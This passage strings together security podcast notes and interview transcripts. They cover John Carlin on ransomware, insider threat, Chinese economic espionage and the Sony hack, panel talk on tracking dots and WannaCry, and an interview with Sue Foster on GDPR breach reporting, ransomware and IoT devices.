Then you can focus your resources, for those who have access, on how they can use it, and really focus on training them and target your training efforts to those who have the access to the highest risk information. Multi-factor authentication, of course, is becoming standard. What else can you do? Segmenting your network. Many of the worst incidents we have are because of the networks were essentially flat and we watch bad guys cruise around the network. Supply chain risk, large majority, Target, Home Depot, etc., a different version of the supply chain but the same idea. Once you get your better practices in place, the risk can sometimes be down the supply chain or with a 3rd party vendor, but it's your brand that suffers in the event of a breach.
Train employees. We talked about how access controls can help you target that training. And then have an incident response plan and exercise it. Some of them will be, you'll go in and there will be an incident response plan, but it's like hundreds of pages, and in an actual incident, nobody's going to look at it. So it needs to be simple enough that people can use, accessible both on the IT, technical side of the house, and the business side of the house, and then exercise, which is, you start spotting issues that really are more corporate governance issues inside the company as you try to do table top exercises. And we've talked a lot about building relationships with law enforcement, and the idea is know by name and by face pre-crisis who it is that you trust in law enforcement, have that conversation with them. This is easier to do if you're a Fortune 500 company to get their attention. If you're smaller, you may have to do it in groups or through an association, but have a sense of who it is that'd you call, and then you need to understand who in your organization will make that call.
Long before websites, apps and IoT devices, one primary way of learning and sharing information is with a printed document. They’re still not extinct yet. In fact, we’ve given them an upgrade to such that nearly all modern color printers include some form of tracking information that associates documents with the printer's serial number. This type of metadata is called tracking dots. We learned about them when prosecutors alleged 25-year-old federal contractor Reality Leah Winner printed a top-secret NSA document detailing the ongoing investigation into Russian election hacking last November and mailed it to The Intercept. Rest assured the Inside Out Security Show panelists all had a response to this form of printed metadata.
Another type of metadata that will be discussed in the Supreme Court is whether the government needs a warrant to access a person’s cell phone location history. “Because cell phone location records can reveal countless private details of our lives, police should only be able to access them by getting a warrant based on probable cause,” said Nathan Freed Wessler, a staff attorney with the ACLU Speech, Privacy, and Technology Project.
Other articles discussed:
The latest release of SANS’ Security Awareness Report attributed communication as one of the primary reasons why awareness programs thrive or fail. Yes, communication is significant, but what does communication mean?
“The goal of communication is to facilitate understanding,” said Inside Out Security Show(IOSS) panelist, Mike Thompson.
Another panelist, Forrest Temple expanded on that idea, “The skill of communication is the clarity through which that process happens. Being about to tell a regular user about the purpose behind the policy is the important part.”
However, IOSS panelist Kilian Englert pushed back on the report’s findings that insinuated users or security pros are to blame when a program fails. Yes, clear communication is vital, but also added, “We’re all in this together.”
Others echoed this sentiment as well when we discussed a recent report that 83% of Security Pros Waste Time Fixing Co-Workers Non-Security Problems.
Other articles discussed:
We’re living in exciting times. Today, if you have an idea as well as a small budget, you can most likely create it. This is particularly true in the technology space, which is why we’ve seen the explosion of IoT devices on the marketplace.
However, what’s uncertain is the byproduct of our enthusiastic making, innovating, and disrupting.
Hypothetical questions that used to be debated on the big screen are questions we’re now debating on our podcast. Will we be able to maintain an appropriate level of privacy within our homes? What are some positive and negative applications of a new technology? Should we extinguish our identification cards so that we can authenticate with biometrics?
On this week’s Inside Out Security Show, Cindy Ng, Kilian Englert, Kris Keyser and Mike Buckbee weigh in on these pressing questions.
Other articles discussed:
We continue with our series with John Carlin, former Assistant Attorney General for the U.S. Department of Justice’s National Security Division. This week, we tackle ransomware and insider threat.
According to John, ransomware continues to grow, with no signs of slowing down. Not to mention, it is a vastly underreported problem. He also addressed the confusion on whether or not one should engage law enforcement or pay the ransom. And even though recently the focus has been on ransomware as an outside threat, let’s not forget insider threat because an insider can potentially do even more damage.
John Carlin: Ransomware, it was skyrocketing when I was in government. In the vast, vast, as I said earlier, majority of the cases, we were hearing about them with the caveat that they were asking us not to make it public, and so it is also vastly under-reported. I don't think there's anywhere near, right now, the reporting. I think Verizon attempted to do a good job. There've been other reports that have attempted to get a firm number on how big the problem is. I think the most recent example that's catching peoples attention is Netflix.
Another area where I think too few companies right now are thinking through how they'd engage law enforcement. And I don't think there's an easy answer. I mean, there's a lot of confusion out there as to whether you should or shouldn't pay. And there was such confusion over FBI folks, when I was there, giving guidance saying, "Always pay." The FBI issued guidance, and we have a link to it here, that officially says they do not encourage paying a ransom. That doesn't mean, though, that if you go into law enforcement that they're gonna order you not to pay. Just like they have for years in kidnapping, I think they may give you advice. They can also give back valuable information. Number one, if it's a group they've been monitoring, they can tell you, and do as they've tried to move more towards the customer service model, they can tell you whether they've seen that group attack other actors before, and if they have, whether if you pay they're likely to go away or not. Because some groups just take your money and continue. Some groups, the group who's asking for your money isn't the same group that hacked you, and they can help you on that as well. Secondly, just as risk-reduction, as the example I gave earlier of Ferizi shows, or the Syrian Electronic Army, you can end up, number one, violating certain laws when it comes to the Treasury, so called OFAC, and material support for terrorism laws by paying a terrorist or other group that's designated as a bad actor. But more importantly, I think for many of you, then, that potential criminal regulatory loss is the brand. You do not want a situation where it becomes clear later that you paid off a terrorist. And so, by telling law enforcement what your doing, you can hedge against that risk.
The other thing you need to do has nothing to do with law enforcement, but is resilience and trying to figure out, "Okay, what are my critical systems, and what's the critical data that could embarrass us? Is it locked down? What would be the risk?" The most recent public example Netflix has shown, you know, some companies decide season 5 of "Orange is the New Black," it's not worth paying off the bad guy.
We've been focusing a lot on outside actors coming inside, and something I think has gotten too little attention or sometimes get too little attention, is the insider threat. That's another trend. As we focus on how, when it comes to outsider threats, the approach needs to change, and instead of focusing so much on perimeter defense, we really need to focus on understanding what's inside a company, what the assets are, what we can do to complicate the life of a bad guy when they get inside your company. Risk mitigation, in other words. A lot of the same expenditures that you would make, or same processes that you put in place to help mitigate that risk, are also excellent at mitigating the risk from insider threat. And that's where you can get a economy of scale on your implementation.
When I took over National Security Division, my first, I think, week, was the Boston Marathon attack. But then, shortly after that was a fellow named Snowden deciding to disclose, on bulk, information that was devastating to certain government agencies across the board. And one of my last acts was indicting another insider and contractor at the National Security Agency who'd similarly taken large amounts of information in October of last year. So, if I can share one lesson, having lived through it on the government end of the spectrum, that sometimes our best agencies, who are very good at erecting barriers and causing complications for those who try to get them from outside the wall, didn't have the same type of protections in place inside the perimeter area, in those that were trusted. And that's something we just see so often in the private sector, as well. In terms of the amount of damage they can do, the insider may actually be the most significant threat that you face. This is the kind of version of the blended threat, the accidental or negligent threat that happens from a human error, and then that's the gap that, no matter how good you are on the IT, the actor exploits. In order to protect against that, you really need to figure out systems internally for flagging anomalous behavior, knowing where your data is, knowing what's valued inside your system, and then putting access controls in place.
From a recent study that Varonis did, and this is completely consistent with my experience both in government, in terms of government systems in government, in terms of providing assistance to the private sector and now giving advice to the private sector, is that it did not surprise me, this fact, although it's disturbing, that nearly half of the respondents indicated that at least 1,000 sensitive files are open to every employee, and that one fifth had 12,000 or more sensitive files exposed to every employee. I can't tell you how many of these I've responded to in crisis mode, where all the lawyers, etc. are trying to figure out how to mitigate risk, who do they need to notify because their files may have been stolen, whether it's business customers or their consumer-type customers. And then, they realize too late, at this point, that they didn't have any access controls in place. This ability to put in an access control is vital, both when you have an insider and also, it shouldn't matter how the person gained access to your system, whether they were outside-in or it's an insider. It's the same risk. And so, what I've found is that...and this was a given example of this that we learned through the OPM hack. But what often happens is the IT side knows how to secure the information or put in access controls, but there's not an easy way to plug in your business side of the house. So, nearly three-fourths of employees say they know they have access to data they don't need to see. More than half said it's frequent or very frequent. And then, on the other side of the house, on the IT, they know that three-quarters of the issues that they're seeing is insider negligence. So, you combine over-access with the fact that people make mistakes, and you get a witches' brew in terms of trying to mitigate risk. So, what you should be looking for there is, "How can I make it as easy as possible to get the business side involved?" They can determine who gets access or who doesn't get access. And the problem right now, I think, with a lot of products out there, is that it's too complicated, and so the business side ignores it and then you have to try to guess at who should or shouldn't have access. All they see then is, "Oh, it's easier just to give everybody access than it is to try to think through and implement the product. I don't know who to call or how to do it."
OPM, major breach inside the government where, according to public reporting, China, but the government has not officially said one way or the other so I'm just relying on public reporting, it breached inside our systems, our government systems. And one of the problems was they were able to move laterally, in a way, and we didn't have a product in place where we could see easily what the data was. And then, it turned out afterwards, as well, there was too much access when it came to the personally identifiable information. I have hundreds of thousands of government employees who ultimately had to get notice because you just couldn't tell what had or hadn't been breached.
When we went to fix OPM, this is another corporate governance lesson, three times the President tried to get the Cabinet to meet so that the business side would help own this risk and decide what data people should have access to, recognizing when you're doing risk mitigation, there may be a loss of efficiency but you should try to make a conscious decision over what's connected to the internet, and if it's connect to the internet, who has access to it and what level of protection, recognizing, you know, as you slim access there can be a loss of efficiency. In order to do that, the person who's in charge is not the Chief Information Officer, it is the Cabinet sector. It is the Attorney General or the Secretary of State. The President tried three times to convene his Cabinet. Twice, I know for Justice, we were guilty because they sent me and our Chief Information Officer, the Cabinet members didn't show up because they figured, "This is too complicated. It's technical. I'm gonna send the cyber IT people." The third time, the Chief of Staff to the President had to send a harsh email that said, "I don't care who you bring with you, but the President is requiring you to show up to the meeting because you own the business here, and you're the only person who can decide who has access, who doesn't and where they should focus their efforts." So, for all the advice we were given, private companies, at the time, we were good at giving advice from government. We weren't as good, necessarily, at following it. That's simply something we recommend people do.
In part two of our series, John Carlin shared with us lessons on economic espionage and weaponized information.
As former Assistant Attorney General for the U.S. Department of Justice’s National Security Division, he described how nation state actors exfiltrated data from American companies, costing them hundreds of billions of dollars in losses and more than two million jobs.
He also reminded us how important it is for organizations to work with the government as he took us down memory lane with the Sony hack. He explained how destructive an attack can be, by using soft targets, such as email that do not require sophisticated techniques.
John Carlin: Let me talk a little bit about economic espionage and how we moved into this new space. When I was a computer-hacking prosecutor prosecuting criminal cases, we were plenty busy. And I worked with an FBI squad, and the squad that I worked with did nothing but criminal cases. There was an intelligence squad who was across the hall, and they were behind a locked, secured compartmented door. The whole time I was doing criminal cases, about 10, 15 years ago, we never went on the other side of that door. If an agent switched squads, they just disappeared behind that locked, secured door. I then went over to the FBI to be Chief of Staff to the director, FBI Director Mueller. And when I was there, that door opened and we started to see day-in, day-out what nation state actors were doing to our country.
And what we saw were state actors, and we had a literal jumbotron screen the size of a movie theater where we could watch it through a visual interface in real time. And we were watching state actors hop into places like universities, go from the university into your company, and then we would literally watch the data exfiltrate out. As we were watching this, it was an incredible feat of intelligence, but we also realized, "Hey, this is not success. We're watching billions and billions of dollars of what U.S. research and development, and our allies, have developed in losses. We're seeing millions of jobs lost." One estimate has it at more than two million jobs. "What can we do to make it clear that the threat isn't about consumer data or IP, the threat is about everything that you value on your system? And how do we make clear that there's an urgent need to address this problem?"
What we did is, when I came back to Justice to lead up the National Security Division, is we looked to start sharing information within government. So, for the first time, every criminal prosecutor's office across the country, all 93 U.S. Attorneys' offices now has someone who's trained on the bits, and the bytes and the Electronic Communication Privacy Act on the one hand. On the other hand, on how to handle sensitive sources and methods, and encouraged to see, can you bring a case? This only happened in 2013. This approach is still very, very new. The FBI issued an edict that said, "Thou shalt share what was formally only on the intelligence side of the house with this new, specially-trained cadre." They then were redeployed out to the field. It's because of that change in approach that we did the first case of its kind, the indictment of five members of the People's Liberation Army, Unit 61398.
This was a specialized unit who, as we laid out in the complaint, they were hitting companies like yours and they were doing it for reasons that weren't national security, they weren't nation-state reasons. They were doing things like...Westinghouse was about to do a joint venture with a partner in China, and right before they were gonna into business together, you watched as the Chinese uniformed members of the People's Liberation Army, the second largest military in the world, went in, attacked their system and instead of paying to lease the lead pipe as they were supposed to do the next day, they went in and stole the technical design specifications so they could get it for free. That's one example laid out in the complaint. Or to give another example, and this is why it's not the type of information that is required to be protected by regulation, like consumer data or intellectual property. Instead, for instance, they went in to a solar company, it was a U.S. subsidiary of a German multi-national and they stole the pricing data from that company. Then the Chinese competitor, using this information stolen by the People's Liberation Army, price dumped. They set their product just below where the competitor would be. That forced that competitor into bankruptcy.
To add insult to injury, when that company sued them for the illegal practice of price dumping, they went and stole the litigation strategy right out from under them. When people said, "Why are you indicting the People's Liberation Army? It isn't state-to-state type activity. Everybody does it, what's the big deal? Criminal process is the wrong way to do it." The reason why we made it public were a couple. One was to make public what they were doing so that businesses would know what it was to protect themselves. Second, what they were doing was theft and that's never been tolerated. And so, there's a concept in U.S. law of what's called an easement. This is the idea that if you let someone walk across your lawn long enough, in U.S. law, they get what's called an easement. They get the right to walk across your lawn. That's why people put up no trespassing signs. International law, which is primarily a law of customary law, works the same way. And as long as we were continuing to allow them to steal day-in, day-out, the Director of the FBI called them like a drunken gorilla because they were so obvious in terms of who they were. They didn't care if they got caught because they were so confident there'd be no consequence. Then, we are setting international law, we are setting the standard as one where it's okay. So, in some respects, this case was a giant "No trespass" sign, "Get off our lawn."
The other thing that we did, though, was we wanted to show the seriousness, that this was their day job. And so, we showed that the activity started at 9 a.m. Beijing time, that it went at a high level from 9:00 to noon Beijing time, it decreased from noon to 1:00, it then increased again from 1:00 to around 6 p.m. Beijing time, decreased on Chinese holidays, weekends. This was the day job of the military, and it's not fair and it can't be expected that a private company alone can defend itself against that type of adversary. This single case had an enormous impact on Chinese behavior, and I wanna move a little bit to the next major cases that occurred. So, that's economic espionage, theft for monetary value.
We also started seeing some of the first destructive attacks. Everyone remembers Sony, and many people think of it as the first destructive attack on U.S. soil. It really wasn't the first destructive attack. The first destructive attack was on Sands Casino by what the Director of National Intelligence called Iranian-affiliated officials. Those Iranian-affiliated actors, when they attacked Sands, they did so because they didn't like what the head of Sands Casino had said about Iran and the Ayatollahs called on people within Iran to attack the company. They did a destructive attack that essentially turned computers into bricks. And it was only, actually, because there was someone quick thinking in the IT staff who was not authorized by their policy, by the way, who spotted what was occurring and essentially pulled the plug, and in that respect was able to segment the attack and keep it confined to a small to a small area, it didn't cause more damage. That didn't get nearly the attention of Sony, so let's talk a little bit about Sony.
You know, I spent nearly 20 years in government working on national security criminal threats. We did enumerable war games where we war-gamed out, "What's it gonna look like if rogue nuclear arms nation decides to attack the United States through cyber-enabled means?" And I don't know about you guys but we all got it wrong, because not once did we guess that the first major incident was gonna be over a movie about a bunch of pot smokers. It's the only time...I remember every morning I'd meet with the Director of the FBI, the Attorney General to go over at the threats. That Christmas we'd all watched the movie the day before, shared movie reviews. And it's the only time in my career where I've gone into the Situation Room to brief the president on a serious national security incident and had to start by trying to summarize the plot of that movie which, for those of you unlucky enough to have seen it, not that I'm passing critical judgement, it is not an easy plot to summarize.
So, why did we do that? Why were we treating this like a serious national security event that had presidential attention? The attack had multiple parts. One was, just like the attack on Sands Casino, it essentially turned computers into bricks. Secondly, they stole, so this is like the economic espionage threat. They stole intellectual property and they distributed it using a third party, the WikiLeaks-type example. Using third parties, they distributed that stolen intellectual property and tried to cause harm to Sony. Nobody remembers those two. What everybody remembers, and this is the weaponizing of the information idea, is that by focusing on a soft target like email communications, it was the salacious email communications inside the company between executives that got such massive media attention. That and, of course, the fact that it's a movie company. That lesson was not unnoticed, and so there's a lot of focus on it and we'll talk about it later. And it was used again, clearly, in the Russian attempt to influence elections not just here in the United States with our most recent election cycle, but both before that in elections across Europe. You can see them trying to use similar tactics and techniques right now when it comes to the French election. They clearly stumbled on the fact that, "Hey, it's not the information inside a company that people put great safeguards around, like their crown jewel of intellectual property. It can be the softer parts like email, like routine communications that, if we gather them in bulk, we can use to weaponize and cause harm to the company."
The reason why we treated that as such a serious national security concern in the White House was because of the reason behind the attack. Just like the attack on Sands Casino, this attack on Sony was fundamentally an attack on our values. It was an attack on the idea that we have free speech. And similarly, the Russian attempts are fundamentally an attack on the idea of democracy. That's why they're attacking democratic institutions not just here in the United States, but across the world.
For you, in the private sector, as we're designing and you're thinking about, you need to have products inside your system that can allow you to monitor broadly what type of attacks are occurring within your perimeter so you can get ahead of a weaponized information-type attack. That means fortifying defenses beyond those that are under legislation or regulation. In order to do that, that means figuring out and using products that are business-friendly. By that I mean, you may be the best information technology folks in the world, if your business side can't understand the tools that you're using or the risks that you're trying to describe to them, then you can't engage them on what could really harm the company most. And that's what you need to do your job, to figure out what that is.
Another thing that we can work on now when it comes to responding quickly is how fast these events occur. And these days, the best practice is to monitor social media. Now, I know a couple companies that they're monitoring social media. In part, it's not just for cyber crisis, right? Every crisis moves that quickly. Some are monitoring it because a certain president of the United States right now, occasionally, will tweet something out in the middle of the night that can cause a company, if he singles you out, he can cause your share price to torpedo by the time the market opens. So certainly, a couple of companies who've actually been though that have rapid communications plans in place, and we've other clients now that just as a best practice have, essentially, a team monitoring that Twitter account from 3 a.m. to 6 a.m. so they can get a communication into the media mainstream before the stock market opens.
That's the same idea when it comes to having systems in place, so you're monitoring social media for mentions of your company and then having a rapid response plan in place. That can also be majorly benefitted by you and your understanding of the system. If you spot where the data is that was stolen and think through with your business side how it can be used, you can get in front of it suddenly appearing somewhere on social media through WikiLeaks or some other site, just through Twitter and so that you're ready to have a rapid response that addresses your business risk.
I want to focus a little bit, as we did, on this idea of working together, government and the private sector. I'm gonna go back to the economic espionage case for a second, the China case. When we did that PLA case, for years before when I was doing the criminal cases, I think companies didn't work with law enforcement because they figured, "What's the upside?" And I'll just talk about that China case, but that case, the indictment of the People's Liberation Army, it changed Chinese behavior, maybe not forever, but for now. It caused President Xi, I think that case, plus the response to Sony where we used the same type of response when it came to North Korea, which was...look, it was incredibly beneficial to Sony when we were able to say that it was North Korea. Until then, all of the attention was on Sony, "What did they do wrong? Why weren't their systems better? Isn't it ridiculous what their executives were saying?" After we could say that it was North Korea, the narrative changed to, "Hey, Government, what are you doing to protect us against nation-state threats?" That is why attributions can matter.
And what did the government do? We applied now, for the second time, the approach that we'd applied for the first time with the People's Liberation Army of, number one, figuring out who did it. And that required working closely with the company to figure out not just what they took, but why they would have taken it, what could have precipitated the event. Number two, collect information in a way that we can make it public. And number three, use it, cause harm to the adversary. And that's why in Sony, unlike in the PLA case, we didn't have a criminal case available to us, so instead of using a criminal case you saw us publicly announce through the FBI who did it, and use that as a basis, then, to sanction North Korea. We realized sitting around the Situation Room table, lucky it was North Korea. If it had been some other cyber actor, unlike North Korea, who hadn't done so many other bad things, we wouldn't have been able to sanction them the way you could terrorists or those who proliferate weapons of mass destruction.
So, going forwards, the president signed a new executive order that allows us to sanction cyber actors. The combination of that new executive order which significantly allows, to use the PLA example, you to sanction not just those who take it, but the companies who make money off of it, those who profit from the stolen information. I think it was that combination of the new executive order in place, the PLA case and the realization that we could make things public and would cause harm that caused President Xi, the leader of China, to blink and sign an unprecedented agreement with President Obama. He sent a crew, we negotiated with them day and night for several days. And they said for the first time, "Hey, we agree, using your military intelligence to target private companies for the benefit of their economic competitor is wrong, and we agree that that should be a norm that you don't do that." That caused the G20 to sign it, and since then we have seen in government and private group monitoring, there's a decrease in terms of how China is targeting private companies. Now, as some of you may be seeing, though, their definition of what's theft for private gain and ours might differ, and there's certainly sectors that are still getting hit and traditional intelligence collection continues.
After WannaCry, US lawmakers introduced the Protecting Our Ability to Counter Hacking Act of 2017, or PATCH Act. If the bill gets passed, it would create a Vulnerabilities Equities Process Review Board where they would decide if a vulnerability, known by the government, would be disclosed to a non-government entity. It won’t be an easy law to iron out as they’ll need to find the right balance between vulnerability disclosure and national security.
Meanwhile Shadow Brokers, the hacking group that leaked the SMBv1 exploit that led to WannaCry, announced that they would create a subscription-based business that would give paying members a monthly data dump of zero-days and exploits.
Grounded in our post WannaCry world, the Inside Out Security Show panelists – Cindy Ng, Mike Thompson and Kilian Englert – mulled over a popular philosophical keynote by Cory Doctorow, The Coming War on General Purpose Computing.
We closed out the show by discussing another potentially deadly attack, Adylkuzz and whether not they’d prefer an attack like ransomware that notifies them or a cryptocurrency miner that consumes resources from their system and they wouldn’t even know it.
Even though it feels like France’s presidential election happened ages ago, it was a very public security win. The Inside Out Security show panelists – Cindy Ng, Kris Keyser, Mike Buckbee, and Kilian Englert synthesize how it all unfolded. They also weighed in on the FBI director’s release from his duties. What’s relevant in this story in the infosec space is what happens after someone leaves an organization.
Other stories discussed:
Sue Foster is a London-based partner at Mintz Levin. In the second part of the interview, she discusses the interesting loophole for ransomware breach reporting requirements that's currently in the GDPR However, there's another EU regulation going into effect in May of 2018, the NIS Directive, which would make ransomware reportable. And Foster talks about the interesting implications of IOT devices in terms of the GDPR. Is the data collected by your internet-connected refrigerator or coffee pot considered personal data under the GDPR? Foster says it is!
Inside Out Security
Sue Foster is a partner with Mintz Levin based out of the London office. She works with clients on European data protection compliance and on commercial matters in the fields of clean tech, high tech, mobile media, and life sciences. She's a graduate of Stanford Law School. SF is also, and we like this here at Varonis, a Certified Information Privacy Professional.
I'm very excited to be talking to an attorney with a CIPP, and with direct experience on a compliance topic we cover on our blog — the General Data Protection Regulation, or GDPR.
Welcome, Susan.
Sue Foster
Hi Andy. Thank you very much for inviting me to join you today. There's a lot going on in Europe around cybersecurity and data protection these days, so it's a fantastic set of topics.
IOS
Oh terrific. So what are some of the concerns you're hearing from your clients on GDPR?
SF
So one of the big concerns is getting to grips with the extra-territorial reach. I work with a number of companies that don't have any office or other kind of presence in Europe that would qualify them as being established in Europe.
But they are offering goods or services to people in Europe. And for these companies, you know in the past they've had to go through quite a bit of analysis to understand the Data Protection Directive applies to them. Under the GDPR, it's a lot clearer and there are rules that are easier for people to understand and follow.
So now when I speak to my U.S. clients, if they're a non-resident company that promotes goods or services in the EU, including free services like a free app, for example, they'll be subject to the GDPR. That's very clear.
Also, if a non-resident company is monitoring the behavior of people who are located in the EU, including tracking and profiling people based on their internet or device usage, or making automated decisions about people based on their personal data, the company is subject to the GDPR.
It's also really important for U.S. companies to understand that there's a new ePrivacy Regulation in draft form that would cover any provider, regardless of location, of any form of publicly available electronic communication services to EU users.
Under this ePrivacy Regulation, the notion of what these communication services providers are is expanded from the current rules, and it includes things that are called over-the-top applications – so messaging apps and communications features, even when a communication feature is just something that is embedded in a website.
If it's available to the public and enables communication, even in a very limited sort of forum, it's going to be covered. That's another area where U.S. companies are getting to grips with the fact that European rules will apply to them.
So this new security regulation as well that may apply to companies located outside the EU. So all of these things are combining to suddenly force a lot of U.S. companies to get to grips with European law.
IOS
So just to clarify, let's say a small U.S. social media company that doesn't market specifically to EU countries, doesn't have a website in the language of some of the EU country, they would or would not fall under the GDPR?
SF
On the basis of their [overall] marketing activity they wouldn't. But we would need to understand if they're profiling or they're tracking EU users or through viral marketing that's been going on, right? And they are just tracking everybody. And they know that they're tracking people in the EU. Then they're going to be caught.
But if they're not doing that, if not engaging in any kind of tracking, profiling, or monitoring activities, and they're not affirmatively marketing into the EU, then they're outside of the scope. Unless of course, they're offering some kind of service that falls under one of these other regulations that we were talking about.
IOS
What we're hearing from our customers is that the 72-hour breach rule for reporting is a concern. And our customers are confused and after looking at some of the fine print, we are as well!! So I'm wondering if you could explain the breach reporting in terms of thresholds, what needs to happen before a report is made to the DBA's and consumers?
SF
Sure absolutely. So first it's important to look at the specific definition of personal data breach. It means a breached security leading to the ‘accidental or unlawful destruction, loss, alteration, unauthorized disclosure of or access to personal data’. So it's fairly broad.
The requirement to report these incidents has a number of caveats. So you have to report the breach to the Data Protection Authority as soon as possible, and where feasible, no later than 72 hours after becoming aware of the breach.
Then there's a set of exceptions. And that is unless the personal data breach is unlikely to result in a risk to the rights and freedoms of natural persons. So I can understand why U.S. companies would sort of look at this and say, ‘I don't really know what that means’. How do I know if a breach is likely to ‘result in a risk to the rights and freedoms of natural persons’?
Because that's not defined anywhere in this regulation!
It's important to understand that that little bit of text is EU-speak that really refers to the Charter of Fundamental Rights of the European Union, which is part of EU law.
There is actually a document you can look at to tell you what these rights and freedoms are. But you can think of it basically in common sense terms. Are the person's privacy rights affected, are their rights and the integrity of their communications affected, or is their property affected?
So you could, for example, say that there's a breach that isn't likely to reveal information that I would consider personally compromising in a privacy perspective, but it could lead to fraud, right? So that could affect my property rights. So that would be one of those issues. Basically, most of the time you're going to have to report the breach.
When you're going through the process of working out whether you need to report the breach to the DPA, and you're considering whether or not the breach is likely to result in a risk to the rights and freedoms of natural persons, one of the things that you can look at is whether people are practically protected.
Or whether there's a minimal risk because of steps you've already taken such as encrypting data or pseudonymizing data and you know that the key that would allow re-identification of the subjects hasn't been compromised.
So these are some of the things that you can think about when determining whether or not you need to report to the Data Protection Authority.
If you decide you have to report, you then need to think about ‘do you need to report the breach to the data subjects’, right?
And the standard there is that is has to be a “high risk to the rights and freedoms” of natural persons’. So a high risk to someone's privacy rights or rights on their property and things of that sort.
And again, you can look at the steps that you've taken to either prevent the data from — you know before it even was leaked — prevent it from being potentially vulnerable in a format where people could be damaged. Or you could think also whether you've taken steps after the breach that would prevent those kinds of risks from happening.
Now, of course, the problem is the risk of getting it wrong, right?
If you decide that you're not going to report after you go through this full analysis and the DPA disagrees with you, now you're running the risk of a fine to 2% of the group’s global turnover …or gross revenue around the world.
And that I think it’s going to lead to a lot of companies being cautious in reporting when even they might have been able to take advantage of some of these exceptions but they won't feel comfortable with that.
IOS
I see. So just to bring it to more practical terms. We can assume that let's say credit card numbers or some other identification number, if that was breach or taken, would have to be reported both to the DPA and the consumer?
SF
Most likely. I mean if it's...yeah almost certainly. Particularly if the security code on the back of the card has been compromised, and absolutely you've got a pretty urgent situation. You also have a responsibility to basically provide a risk assessment to the individuals, and advise them on steps that they can take to protect themselves such as canceling their card immediately.
IOS
One hypothetical that I wanted to ask you about is the Yahoo breach, which technically happened a few years ago. I think it was over two years ago … Let's say something like that had happened after the GDPR where a company sort of had known that there was something happening that looked like a breach, but they didn't know the extent of it.
If they had not reported it, and waited until after the 72-hour rule, what would have happened to let's say a multinational like Yahoo?
SF
Well, Yahoo would need to go through the same analysis, and it's hard to imagine that a breach on that scale and with the level of access that was provided to the Yahoo users accounts as a result of those breaches, and of course the fact that people know that it's very common for individuals to reuse passwords across different sites, and so you, you know, have the risks sort of follow on problems.
It's hard to imagine they would be in a situation where they would be off the hook for reporting.
Now the 72-hour rule is not hard and fast.
But the idea is you report as soon as possible. So you can delay for a little while if it's necessary for say a law enforcement investigation, right? That's one possibility.
Or if you're doing your own internal investigation and somehow that would be compromised or taking security measures would be compromised in some way by reporting it to the DPA. But that'll be pretty rare.
Obviously going along for months and months with not reporting it would be beyond the pale. And I would say a company like Yahoo would potentially be facing a fine of 2% of its worldwide revenue!
IOS
So this is really serious business, especially for multinationals.
This is also a breach reporting related question, and it has to do with ransomware. We're seeing a lot of ransomware attacks these days. In fact, when we visit customer sites and analyze their systems, we sometimes see these attacks happening in real time. Since a ransomware attack encrypts the file data but most of the time doesn't actually take the data or the personal data, would that breach have to be reported or not?
SF
This is a really interesting question! I think the by-the-book answer is, technically, if a ransomware attack doesn't lead to the accidental or unlawful destruction, loss, or alteration or unauthorized disclosure of or access to the personal data, it doesn't actually fall under the GDPR's definition of a personal data breach, right?
So, if a company is subject to an attack that prevents it from accessing its data, but the intruder can not itself access, change or destroy the data, you could argue it's not a personal data breach, therefore not reportable.
But it sure feels like one, doesn't it?
IOS
Yes, it does!
SF
Yeah. I suspect we're going to find that the new European Data Protection Board will issue guidance that somehow brings ransomware attacks into the fold of what's reportable. Don't know that for sure, but it seems likely to me that they'll find a way to do that.
Now, there are two important caveats.
Even though, technically, a ransomware attack may not be reportable, companies should remember that a ransomware attack could cause them to be in breach of other requirements of the GDPR, like the obligation to ensure data integrity and accessibility of the data.
Because by definition, you know, the ransomware attack has made the data non-assessable and has totally corrupted its integrity. So, there could be a liability there under the GDPR.
And also, the company that's suffering the ransomware attack should consider whether they're subject to the new Network and Information Security Directive, which is going to be implemented in national laws by May 9th of 2018. So again, May 2018 being a real critical time period. That directive requires service providers to notify the relevant authority when there's been a breach that has a substantial impact on the services, even if there was no GDPR personal data breach.
And the Network and Information Security Directive applies to a wide range of companies, including those that provide "essential services”. Sort of the fundamentals that drive the modern economy: energy, transportation, financial services.
But also, it applies to digital service providers, and that would include cloud computing service providers.
You know, there could be quite a few companies that are being held up by ransomware attacks who are in the cloud space, and they'll need to think about their obligations to report even if there's maybe not a GDPR reporting requirement.
IOS
Right, interesting. Okay. As a security company, we've been preaching Privacy by Design principles, data minimization and retention limits, and in the GPDR it's now actually part of the law.
The GDPR is not very specific about what has to be done to meet these Privacy by Design ideas, so do you have an idea what the regulators might say about PbD as they issue more detailed guidelines?
SF
They'll probably tell us more about the process but not give us a lot of insight as to specific requirements, and that's partly because the GDPR itself is very much a show-your-work regulation.
You might remember back on old,old math tests, right? When you were told, ‘Look, you might not get the right answer, but show all of your work in that calculus problem and you might get some partial credit.’
And it's a little bit like that. The GDPR is a lot about process!
So, the push for Privacy by Design is not to say that there are specific requirements other than paying attention to whatever the state of the art is at the time. So, really looking at the available privacy solutions at the time and thinking about what you can do. But a lot of it is about just making sure you've got internal processes for analyzing privacy risks and thinking about privacy solutions.
And for that reason, I think we're just going to get guidance that stresses that, develops that idea.
But any guidance that told people specifically what security technologies they needed to apply would probably be good for, you know, 12 or 18 months, and then something new would come along.
Where we might see some help is, eventually, in terms of ISO standards. Maybe there'll be an opportunity in the future for something that comes along that's an international standard, that talks about the process that companies go through to design privacy into services and devices, etc. Maybe then we'll have a little more certainty about it.
But for now, and I think for the foreseeable future, it's going to be about showing your work, making sure you've engaged, and that you've documented your engagement, so that if something does go wrong, at least you can show what you did.
IOS
That's very interesting, and a good thing to know. One last question, we've been following some of the security problems related to Internet of Things devices, which are gadgets on the consumer market that can include internet-connected coffee pots, cameras, children toys.
We've learned from talking to testing experts that vendors are not really interested in PBD. It's ship first, maybe fix security bugs later. Any thoughts on how the GDPR will effect IOT vendors?
SF
It will definitely have an impact. The definition of personal data under the GDPR is very, very broad. So, effectively, anything that I am saying that a device picks up is my personal data, as well as data kind of about me, right?
So, if you think about a device that knows my shopping habits that I can speak to and I can order things, everything that the device hears is effectively my personal data under the European rules.
And Internet of Things vendors do seem to be lagging behind in Privacy by Design. I suspect we're going to see investigations and fines in this area early on, when the GDPR starts being enforced on May, 2018.
Because the stories about the security risks of, say, children's toys have really caught the attention of the media and the public, and the regulators won't be far behind.
And now, we have fines for breaches that range from 2% to 4% of a group's global turnover. It's an area that is ripe for enforcement activity, and I think it may be a surprise to quite a few companies in this space.
